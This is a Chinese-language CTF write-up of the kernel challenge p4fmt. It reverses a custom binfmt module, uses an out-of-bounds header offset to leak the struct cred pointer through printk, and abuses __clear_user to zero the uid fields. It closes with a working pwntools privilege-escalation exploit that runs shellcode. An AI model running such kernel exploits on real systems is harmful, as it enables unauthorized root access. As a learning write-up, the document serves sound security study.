p4fmt writeup

前言

p4fmt 是今年 3 月時,由 p4 第一次主辦的 CONFidence CTF Teaser 2019 中的題目,雖然現在解完了覺得相對其他 kernel 的題目這算是比較新手友善的,但當時因為比賽時間只有一天並且之前沒有 kernel exploit 的經驗,就卡在一些細節上沒解出來。賽後想找些時間來看,不過大三下實在是比較忙碌,所以就一路拖到上週才好好坐下來解這題

初見

題目解壓縮後有三個檔案,分別是 kernel image, initramfs 以及執行 qemu 的腳本

root:p4fmt/ $ tree
.
├── bzImage
├── initramfs.cpio.gz
└── run.sh

0 directories, 3 files
user:p4fmt/ $ cat run.sh
#!/bin/bash
qemu-system-x86_64 -kernel ./bzImage \
                -initrd ./initramfs.cpio.gz \
                -nographic \
                -append "console=ttyS0" \

總之先跑起來看看

====================
p4fmt
====================

Kernel challs are always a bit painful.
No internet access, no SSH, no file copying.

You're stuck with copy pasting base64'd (sometimes static) ELFs.
But what if there was another solution?

We've created a lightweight, simple binary format for your
pwning pleasure. It's time to prove your skills.

/ $ ls -al
total 20
drwxr-xr-x   12 root     0              300 Mar 15  2019 .
drwxr-xr-x   12 root     0              300 Mar 15  2019 ..
drwxr-xr-x    2 root     0             7880 Mar 14  2019 bin
drwxr-xr-x    2 root     0               80 Oct  1 07:58 dev
drwxr-xr-x    2 root     0               60 Mar 15  2019 etc
-rw-------    1 root     0               20 Mar 15  2019 flag
drwxr-xr-x    3 root     0               60 Mar 15  2019 home
-rwxr--r--    1 root     0              520 Mar 15  2019 init
-rw-r--r--    1 root     0             8384 Mar 15  2019 p4fmt.ko <--
dr-xr-xr-x   35 root     0                0 Oct  1 07:58 proc
drwx------    2 root     0               40 Mar 14  2019 root
drwxr-xr-x    2 root     0               40 Mar 14  2019 sbin
dr-xr-xr-x   12 root     0                0 Oct  1 07:58 sys
drwxrwxrwx    2 root     0               40 Mar 15  2019 tmp
drwxr-xr-x    4 root     0               80 Mar 14  2019 usr

馬上就會發現根目錄中有個 p4fmt.ko kernel module,沒意外就是本題的漏洞所在
lsmod 可以確認他確實有被載入到 kernel 中

/ $ lsmod
p4fmt 16384 0 - Live 0x0000000000000000 (O)

因為 p4fmt.ko 在 initramfs 中,我們可以利用 cat initramfs.cpio.gz | gzip -d | cpio -idv 把檔案解出來

接著看看 linux kernel 版本,發現是當時最新的 5.0.0 版號

/ $ cat /proc/version
Linux version 5.0.0 (chivay@outcast) (gcc version 8.2.1 20181127 (GCC)) #2 SMP Fri Mar 15 09:13:12 CET 2019

分析

拿到 p4fmt.ko 之後就直接拖進 IDA 分析

從 module 的 init function 可以瞭解到,這支 kernel module 會在 kernel 中註冊一個 binary format,就像是 linux kernel 預設註冊的 ELF 格式一樣,所以若是格式正確,kernel 就會載入這種特殊格式的執行檔

__int64 p4fmt_init()  // module init function: registers the p4format binary-format handler
{
  _register_binfmt(&p4format, 1LL);
  return 0LL;  // always reports success
}

接著觀察用於檢查檔案格式是否正確和處理載入的函式 load_p4_binary

__int64 __fastcall load_p4_binary(__int64 a1)  // a1: the struct linux_binprm * for this exec (it is later passed to install_exec_creds)
{
    signed __int64 v1; // rcx
    const char *v2; // rsi
    __int64 elfbase; // r12
    __int64 v4; // rbx
    _BYTE *bufptr; // rdi
    unsigned __int64 v6; // r14
    bool v7; // cf
    bool v8; // zf
    __int64 v9; // r13
    unsigned int v10; // ebp
    char version; // al
    signed __int64 entry_point; // r12
    signed __int64 v14; // rsi
    unsigned __int64 v15; // rax
    __int64 *segment_hdr; // r12
    __int64 v17; // ST00_8
    signed __int64 prot; // r14
    unsigned __int64 addr; // r15
    __int64 offset; // r9
    __int64 len; // rdx
    __int64 v22; // rcx
    __int64 v23; // r8

    v1 = 2LL;
    v2 = "P4";
    elfbase = a1 + 0x48;  // start of the file header bytes inside a1; every header field below is relative to this
    v4 = a1;
    bufptr = (_BYTE *)(a1 + 0x48);
    v6 = __readgsqword((unsigned __int64)&current_task);
    v7 = 0;
    v8 = 0;
    v9 = *(_QWORD *)(v6 + 672);
    do                                // check "P4"
    {
        if ( !v1 )
            break;
        v7 = (const unsigned __int8)*v2 < *bufptr;
        v8 = *v2++ == *bufptr++;
        --v1;
    }
    while ( v8 );
    if ( (!v7 && !v8) != v7 )
        return (unsigned int)-8;      // ENOEXEC
    JUMPOUT(*(_BYTE *)(v4 + 0x4A), 0, load_p4_binary_cold_2);
    if ( *(_BYTE *)(v4 + 0x4B) > 1u )   // version byte: only 0 and 1 are accepted
        return (unsigned int)-22;     // EINVAL
    v10 = flush_old_exec(v4);
    if ( !v10 )
    {
        *(_DWORD *)(v6 + 128) = 0x800000;
        setup_new_exec(v4);
        version = *(_BYTE *)(v4 + 0x4B);
        if ( version )
        {
            if ( version != 1 )
                return (unsigned int)-22;
            if ( *(_DWORD *)(v4 + 0x4C) )      // segment counts
            {
                segment_hdr = (__int64 *)(*(_QWORD *)(v4 + 0x50) + elfbase);// no check, use it to leak address in printk
                do
                {
                    v17 = *segment_hdr;  // raw load_address word, flag bits included
                    prot = *segment_hdr & 7;  // low 3 bits are passed to vm_mmap as the protection
                    addr = *segment_hdr & 0xFFFFFFFFFFFFF000LL;  // page-aligned mapping address
                    printk(
                        "vm_mmap(load_addr=0x%llx, length=0x%llx, offset=0x%llx, prot=%d)\n",
                        addr,
                        segment_hdr[1],
                        segment_hdr[2],
                        prot);
                    offset = segment_hdr[2];
                    len = segment_hdr[1];
                    if ( v17 & 8 )  // bit 3 set: map with a null first argument, then zero the range
                    {
                        vm_mmap(0LL, addr, len, (unsigned __int8)prot, 2LL, offset);  // return value is not checked
                        printk("clear_user(addr=0x%llx, length=0x%llx)\n", *segment_hdr, segment_hdr[1], v22, v23);
                        _clear_user(*segment_hdr, segment_hdr[1]);  // uses the raw header value, not the page-aligned addr
                    }
                    else
                    {
                        vm_mmap(*(_QWORD *)(v4 + 8), addr, len, (unsigned __int8)prot, 2LL, offset);  // *(v4 + 8) is presumably bprm->file - TODO confirm
                    }
                    ++v10;
                    segment_hdr += 3;  // each segment header is three qwords
                }
                while ( *(_DWORD *)(v4 + 0x4C) > v10 );
            }
        }
        else
        {
            entry_point = -12LL;
            if ( (unsigned __int64)vm_mmap(
                               *(_QWORD *)(v4 + 8),
                               *(_QWORD *)(v4 + 80),
                               4096LL,
                               *(_QWORD *)(v4 + 80) & 7LL,
                               2LL,
                               0LL) > 0xFFFFFFFFFFFFF000LL )
            {
LABEL_12:
                install_exec_creds(v4);
                set_binfmt(&p4format);
                v14 = 0x7FFFFFFFF000LL;
                v15 = __readgsqword((unsigned __int64)&current_task);
                if ( *(_QWORD *)v15 & 0x20000000 )
                {
                    v14 = 0xC0000000LL;
                    if ( !(*(_BYTE *)(v15 + 131) & 8) )
                        v14 = 0xFFFFE000LL;
                }
                v10 = setup_arg_pages(v4, v14, 0LL);
                if ( !v10 )
                {
                    finalize_exec(v4);
                    start_thread(
                        v9 + 0x3F58,
                        entry_point,
                        *(_QWORD *)(*(_QWORD *)(__readgsqword((unsigned __int64)&current_task) + 256) + 40LL));
                }
                return v10;
            }
        }
        entry_point = *(_QWORD *)(v4 + 0x58);  // entry point is the qword at header offset 0x10
        goto LABEL_12;
    }
    return v10;
}

(以下行號皆以上方 load_p4_binary 列表的第一行為第 1 行計算) 第 1 到 57 行左右用於檢查 P4 執行檔的格式是否正確,第 30 行的 bufptr 指標指向欲處理的 binary 的前 128 byte (execve 時會讀取執行檔的前 128 byte 作為 header),第 59 行確認使用者是否有提供需要自行決定載入地址的 segment,接著便依照提供的資訊做 vm_mmap

逆向之後可以推出 P4 執行檔的格式如下:

struct segment_hdr {
    __int64 load_address;  // bits 0-2: protection passed to vm_mmap; bit 3 (0x8): "clear" flag; & ~0xfff: mapping address
    __int64 length;  // length passed to vm_mmap (and to the clear when bit 3 is set)
    __int64 offset;  // offset passed to vm_mmap
}

struct P4 {
    const char magic[3] = { 'P', '4', '\0' };
    __int8 version = 1;  // the loader accepts 0 or 1; the segment table is only parsed for version 1
    __int32 segment_count;  // number of segment_hdr entries the loader walks
    __int64 segment_header_offset;  // byte offset from the start of this header; the loader does not bounds-check it
    __int64 elf_entry;  // address handed to start_thread as the entry point
    
    ... after segment_header_offset bytes ...
    
    struct segment_hdr seg[segment_count];
    
    char data[];
}

問題發生在第 59, 61 行處的 if ( *(_DWORD *)(v4 + 0x4C) ) 與 segment_hdr = (__int64 *)(*(_QWORD *)(v4 + 0x50) + elfbase); 這兩行: 程式在計算 segment header 的位置時,沒有對使用者提供的 segment count 及 offset 進行檢查,因此 segment_hdr 可以指到 header 緩衝區之外,造成接下來處理 vm_mmap 時可以被 printk 洩漏任意地址任意長度的 kernel memory

那究竟可以 leak 出甚麼呢?
得要先知道 v4 變數是甚麼,透過查閱 kernel source code 可以得知 103 行 install_exec_creds 的參數 v4 為 struct linux_binprm

/*
 * This structure is used to hold the arguments that are used when loading binaries.
 */
struct linux_binprm {
	char buf[BINPRM_BUF_SIZE];
#ifdef CONFIG_MMU
	struct vm_area_struct *vma;
	unsigned long vma_pages;
#else
# define MAX_ARG_PAGES	32
	struct page *page[MAX_ARG_PAGES];
#endif
	struct mm_struct *mm;
	unsigned long p; /* current top of mem */
	unsigned long argmin; /* rlimit marker for copy_strings() */
	unsigned int
		/*
		 * True after the bprm_set_creds hook has been called once
		 * (multiple calls can be made via prepare_binprm() for
		 * binfmt_script/misc).
		 */
		called_set_creds:1,
		/*
		 * True if most recent call to the commoncaps bprm_set_creds
		 * hook (due to multiple prepare_binprm() calls from the
		 * binfmt_script/misc handlers) resulted in elevated
		 * privileges.
		 */
		cap_elevated:1,
		/*
		 * Set by bprm_set_creds hook to indicate a privilege-gaining
		 * exec has happened. Used to sanitize execution environment
		 * and to set AT_SECURE auxv for glibc.
		 */
		secureexec:1;
#ifdef __alpha__
	unsigned int taso:1;
#endif
	unsigned int recursion_depth; /* only for search_binary_handler() */
	struct file * file;
	struct cred *cred;	/* new credentials */
	int unsafe;		/* how unsafe this exec is (mask of LSM_UNSAFE_*) */
	unsigned int per_clear;	/* bits to clear in current->personality */
	int argc, envc;
	const char * filename;	/* Name of binary as seen by procps */
	const char * interp;	/* Name of the binary really executed. Most
				   of the time same as filename, but could be
				   different for binfmt_{misc,script} */
	unsigned interp_flags;
	unsigned interp_data;
	unsigned long loader, exec;

	struct rlimit rlim_stack; /* Saved RLIMIT_STACK used during exec. */
} __randomize_layout;

其中一個重要的元素便是紀錄該 process 身分資訊的 struct cred *cred,只要將 offset 設為 buf 與 cred 兩者位置的差值就可以 leak 出來了才對,但是如果直接填入該 offset 進行 leak 的話,會發現 leak 出來的指標明顯是錯的,為甚麼呢?

不知道各位在逆向的時候有沒有注意到,雖然 buf 這個元素在結構中排第一個,
但是檢查 magic string “P4” 時 bufptr 的 offset 居然是 0x48 (bufptr = (_BYTE *)(a1 + 0x48);)

所以在這裡對於新手(就我啦)來說最需要注意到的細節是最下方的 __randomize_layout

這是一個於 2017 年被導入到 linux kernel 中的防護機制,屬於 KSPP(Kernel Self Protection Project) 的一部分,其功能是在編譯時期透過一個亂數種子,將有標記 __randomize_layout 的結構體中的元素作亂序排列,進而使攻擊者難以找出元素對應的地址,詳細可以參考這篇 LWN.net 上的文章 Randomizing structure layout

也就是在沒有 debug info 的情況下,我們只能從程式碼中找出哪裡使用到該變數,藉此得知它的位置

所以只好開 gdb 做 kernel debugging 了(笑)

動態分析 kernel module

為了讓動態分析更輕鬆,有一些前置步驟要做

修改 initramfs 中的 init 腳本,將 setsid cttyhack su pwn 改為 sh 讓我們可以直接拿到 root shell,這是為了直接定位 p4fmt.ko 被載入到 kernel 中的地址

用下方指令重新打包 initramfs
(小提醒: --format=newc 一定要加,不然 qemu 掛載時會跳 kernel panic)

find . | cpio -ov --format=newc | gzip -9 > ../modified.cpio.gz

接著在 run.sh 裡新增 -s 參數,這樣會讓 qemu 在 localhost:1234 開啟 gdb debug server,同時也記得將 -initrd 參數的值改為剛剛重新打包過的 initramfs

最後,我們需要將 bzImage 中的 vmlinux 執行檔解出來才能 debug,這個步驟可以交給 linux kernel source 中的腳本 extract-vmlinux 來完成

./extract-vmlinux bzImage > vmlinux

qemu 跑起來 gdb 開起來,可以開始 debug 啦XD
拿到 root shell 先 lsmod 看 p4fmt.ko 被載入的地址

/ # lsmod
p4fmt 16384 0 - Live 0xffffffffc03c4000 (O)

再來透過 gdb 接入 kernel,載入 p4fmt 的 symbol

$ gdb vmlinux
gef> target remote :1234
gef> add-symbol-file p4fmt.ko 0xffffffffc03c4000

接著為了找出 cred 的地址,鎖定這個一臉就是會用到 cred 的 function install_exec_creds,查閱 fs/exec.c 可以得知其中的 commit_creds 函式會使用到 bprm->cred

/*
 * install the new credentials for this executable
 */
void install_exec_creds(struct linux_binprm *bprm)
{
	security_bprm_committing_creds(bprm);

	commit_creds(bprm->cred);
	bprm->cred = NULL;

	/*
	 * Disable monitoring for regular users
	 * when executing setuid binaries. Must
	 * wait until new credentials are committed
	 * by commit_creds() above
	 */
	if (get_dumpable(current->mm) != SUID_DUMP_USER)
		perf_event_exit_task(current);
	/*
	 * cred_guard_mutex must be held at least to this point to prevent
	 * ptrace_attach() from altering our determination of the task's
	 * credentials; any time after this it may be unlocked.
	 */
	security_bprm_committed_creds(bprm);
	mutex_unlock(&current->signal->cred_guard_mutex);
}

程式在第二個 function call (commit_creds(bprm->cred)) 前存取 [rbx+0xe0] 將值取出,所以 cred 的 offset 就是 0xe0 了

0xffffffff90789ec0                  push   rbx
0xffffffff90789ec1                  mov    rbx, rdi
0xffffffff90789ec4                  call   0xffffffff90897aa0
0xffffffff90789ec9                  mov    rdi, QWORD PTR [rbx+0xe0]
0xffffffff90789ed0                  call   0xffffffff90673d30

到這步我們就可以利用 segment header offset 來 leak bprm->cred

現在問題是要怎麼利用這個 leak 出來的地址呢? 看回 load_p4_binary 第 75 到 80 行

if ( v17 & 8 )
{
  vm_mmap(0LL, addr, len, (unsigned __int8)prot, 2LL, offset);
  printk("clear_user(addr=0x%llx, length=0x%llx)\n", *segment_hdr, segment_hdr[1], v22, v23);
  _clear_user(*segment_hdr, segment_hdr[1]);
}

只要給定的 load address 有設定一個 flag (0x8),便會透過 __clear_user 對該段記憶體資料寫 0
問題是雖然 load address 是我們可控的,那究竟能不能藉由這個函式對 kernel space 操作呢,函式的名稱叫 __clear_user 耶?

一樣翻閱 source code arch/x86/lib/usercopy_64.c

/*
 * Zero Userspace
 */

unsigned long __clear_user(void __user *addr, unsigned long size)
{
	long __d0;
	might_fault();
	/* no memory constraint because it doesn't change any memory gcc knows
	   about */
	stac();
	asm volatile(
		"	testq  %[size8],%[size8]\n"
		"	jz     4f\n"
		"0:	movq $0,(%[dst])\n"
		"	addq   $8,%[dst]\n"
		"	decl %%ecx ; jnz   0b\n"
		"4:	movq  %[size1],%%rcx\n"
		"	testl %%ecx,%%ecx\n"
		"	jz     2f\n"
		"1:	movb   $0,(%[dst])\n"
		"	incq   %[dst]\n"
		"	decl %%ecx ; jnz  1b\n"
		"2:\n"
		".section .fixup,\"ax\"\n"
		"3:	lea 0(%[size1],%[size8],8),%[size8]\n"
		"	jmp 2b\n"
		".previous\n"
		_ASM_EXTABLE_UA(0b, 3b)
		_ASM_EXTABLE_UA(1b, 2b)
		: [size8] "=&c"(size), [dst] "=&D" (__d0)
		: [size1] "r"(size & 7), "[size8]" (size / 8), "[dst]"(addr));
	clac();
	return size;
}

答案是可以的。雖然原始碼每一處都告訴開發者這是用來對 userspace 操作的函式,但是 __clear_user 本身並沒有對參數做檢查 (會先用 access_ok 確認地址屬於 userspace 的是不帶底線的 clear_user),所以傳入 kernel space 的地址一樣會被清零。想到這就可以開始寫 exploit 了

Exploit

想法是拆成兩個 binary 來完成,先利用越界存取漏洞 leak cred,再以 __clear_user 將 cred 上的各種 uid 清零,也就是使 uid = 0(root)

struct cred 結構體中有多個不同功能的 uid,雖然因為前面提到的隨機化我們並不知道對應的 offset,但這裡只需透過 gdb 將記憶體內容印出來觀察即可: 值為 0x3e8 = 1000 (pwn 的 uid) 的欄位就是要清零的目標

gef>  x/20gx $rdi
0xffffa0a7474e0cc0:     0x0000000000000000      0xffffa0a74764a440
0xffffa0a7474e0cd0:     0x0000000000000000      0x00000000000003e8
0xffffa0a7474e0ce0:     0x0000000000000000      0x0000000000000000
0xffffa0a7474e0cf0:     0xffffffff000003e8      0x000003e80000003f
0xffffa0a7474e0d00:     0x0000000000000000      0x000003e800000000
0xffffa0a7474e0d10:     0x000003e8000003e8      0x00000000000003e8
0xffffa0a7474e0d20:     0x0000000000000000      0xffffa0a7474e0b40
0xffffa0a7474e0d30:     0x000003e800000000      0x0000000000000000
0xffffa0a7474e0d40:     0x0000000000000001      0x0000000000000000
0xffffa0a7474e0d50:     0x0000000000000000      0x0000000000000000

不過在實作上遇到兩個問題:

  • 每次 leak cred 的地址不同
  • 第一次 leak cred 的地址和第二次使用的地址不相同

第一點在我觀察了一陣子後發現它是會重複的,每五次一個循環;但是第二點的地址偶爾會相同,或是在同一個循環內,觀察了很久還是沒有搞懂,最後只好嘗試暴力解了 (我對 kernel 分配記憶體的機制不熟,還請瞭解的大佬解惑)

最終的 exploit script:

#!/usr/bin/env python
from pwn import *
import sys

context.arch = 'amd64'
#context.log_level = 'debug'

# Layout of the second-stage P4 file and the values used in its segment headers.
segment_hdr_off = 0x30  # file offset of the segment header table
text_off = 0xa0  # file offset of the shellcode; the entry point is load_addr + text_off
load_addr = 0x800000  # address the file is mapped at
length = 0x800  # mapping length requested for the code segment
RX = 0x5  # protection bits OR-ed into the low 3 bits of load_address (presumably PROT_READ | PROT_EXEC)
clear = 0x8  # load_address flag bit that makes the module zero the segment's range

# Connection to the challenge shell; every attempt reuses it.
r = remote('localhost', 4000)

def pwnp4():
    """Make one attempt at getting a root shell on the remote target.

    Stage 1 uploads and runs a one-segment P4 binary whose segment header
    offset points outside the header buffer, so the module's printk prints
    kernel memory as the segment fields; the ``length=`` field is parsed as
    the ``struct cred`` pointer.

    Stage 2 uploads a two-segment binary: the first segment maps the file
    (and with it the shellcode) at ``load_addr``, the second carries the
    "clear" flag so the module zeroes 0x44 bytes starting at ``cred + 0x18``.
    ``/tmp/pwn`` is then run up to ten times, because the cred in use during
    a later exec is not always at the leaked address.

    Returns None when no root prompt shows up.  On success the session is
    handed to the user and the process exits.  Any tube error (EOF, parse
    failure of the leaked value) propagates to the caller.

    All payload pieces are ``bytes`` literals so the function behaves the
    same on Python 2 and Python 3.
    """
    # ---- stage 1: leak the cred pointer through printk -------------------
    p4_leak = b'P4\x00'
    p4_leak += p8(1)  # version number
    p4_leak += p32(1)  # number of segments
    # Offset of the segment header; deliberately past the header so that the
    # loader reads struct linux_binprm fields as a segment header.
    # NOTE(review): the writeup puts the header at bprm+0x48 and cred at
    # bprm+0xe0, which would place cred in the printed "length" field at
    # offset 0x90, not 0xb0.  The published value is kept - confirm against
    # the target kernel.
    p4_leak += p64(0xb0)
    p4_leak += p64(0)  # elf entry
    leak_cmd = (
        "echo '" + b64e(p4_leak) + "' | base64 -d > /tmp/leak; "
        "chmod +x /tmp/leak; /tmp/leak"
    )

    r.sendlineafter(b'/ $ ', leak_cmd.encode('ascii'))
    r.recvuntil(b'length=')
    cred = int(r.recvuntil(b',', drop=True), 16)
    print('leak cred: %#x' % cred)

    # First id field to wipe; the 0x18 offset was read off a gdb dump of the
    # cred object because the struct layout is randomized.
    ids_start = cred + 0x18

    # ---- stage 2: zero the ids and run shellcode -------------------------
    p4_pwn = b'P4\x00'
    p4_pwn += p8(1)  # version number
    p4_pwn += p32(2)  # number of segments
    p4_pwn += p64(segment_hdr_off)  # offset of segment header
    p4_pwn += p64(load_addr + text_off)  # elf entry
    p4_pwn = p4_pwn.ljust(segment_hdr_off, b'\x00')

    # segment header (addr, len, offset)
    # 1: map the file itself read+exec at load_addr
    p4_pwn += p64(load_addr | RX)
    p4_pwn += p64(length)  # align up to 0x1000
    p4_pwn += p64(0)  # caution: offset must be a multiple of the page size (see `man mmap`)
    # 2: "clear" segment - the module zeroes [addr, addr + len) itself.
    # The flag shares the low bits with the address, so this relies on
    # ids_start already having bit 3 set and bits 0-2 clear (true when cred
    # is 16-byte aligned - assumption, matches the dumped addresses).
    p4_pwn += p64(ids_start | clear)
    p4_pwn += p64(0x44)
    p4_pwn += p64(0)

    p4_pwn = p4_pwn.ljust(text_off, b'\x00')

    p4_pwn += asm(shellcraft.sh())
    pwn_cmd = "echo '" + b64e(p4_pwn) + "' | base64 -d > /tmp/pwn; chmod +x /tmp/pwn;"

    r.sendlineafter(b'/ $ ', pwn_cmd.encode('ascii'))

    for _ in range(10):
        r.sendline(b'/tmp/pwn')
        r.recvuntil(b'/ ')
        sh = r.recvn(2)

        # Prompt is "/ $ " for the unprivileged user and "/ # " for root.
        # Compare a slice, not sh[0]: indexing bytes yields an int on
        # Python 3 and would never equal '#'.
        if sh[:1] == b'#':
            r.interactive()
            sys.exit()

# Brute-force driver: the leaked cred address is only sometimes the one in
# use on the next exec, so the whole leak + overwrite sequence is retried.
# pwnp4() exits the process itself once it sees a root prompt.
for attempt in range(1, 11):
    try:
        pwnp4()
    except KeyboardInterrupt:
        sys.exit()
    except Exception as exc:
        # Failures are expected while brute-forcing; keep going, but report
        # them so a dead connection or a parse error is not hidden.
        log.warning('attempt %d failed: %r', attempt, exc)
else:
    log.failure('no root shell after 10 attempts')